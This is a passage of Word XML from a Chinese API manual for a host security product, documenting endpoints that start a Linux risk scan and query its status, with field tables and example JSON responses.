          <w:p w14:paraId="43BE4E76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D4CBBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="122A4083" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01D763BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F1999B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542A8501" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E3D5672" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="760A74C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F9A70C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="798A5FCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C8A6A21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75165D69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2ACB0118" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2F35BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="502D4ABB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7498D52D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2637191C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="608662A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F5B8DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C179CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6AC248" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CAC13F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D9F9173" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E82EFBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20340E6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0819A971" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B85F89D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="520915C4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D9BD0A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9F80E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B205A7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233C0E9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4194E8A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="linux全部风险扫描"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>linux全部风险扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE3074" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="开始linux全部风险扫描除风险文件外"/>
      <w:r>
        <w:t>开始linux全部风险扫描(除风险文件外)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D858731" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供开始linux全部风险扫描的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A02D5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8CBA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/linux/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8DBF3"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497C54" w14:paraId="3D4DF69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10AA170" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE02D51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="763737EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F6914C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1CF957ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FB08AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2388C9AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51AD3920" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D756D91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39E8CCC6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24AEE981" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6540BB80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F65FBD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="067B0E86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="079A5DBF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33049435" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B68BA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63182356" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301097C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="480B1651" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C640886" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7FA7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B413FFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214097B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46081F6B"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500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"errorMessage"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA159A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B8498"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4CEA9847"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206114B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EE0CC8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711471F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3864559D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3535E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C360D25" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47657764" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA22447" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59566F50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F940C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70A326E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="linux全部风险扫描状态查询除风险文件外"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r>
        <w:t>linux全部风险扫描状态查询(除风险文件外)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E18131B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供linux全部风险扫描状态查询的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA1CCA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634CDFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CEC935" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6209EAD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31832C39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104452B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//当前job的jobId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>如果为null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2824E475" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
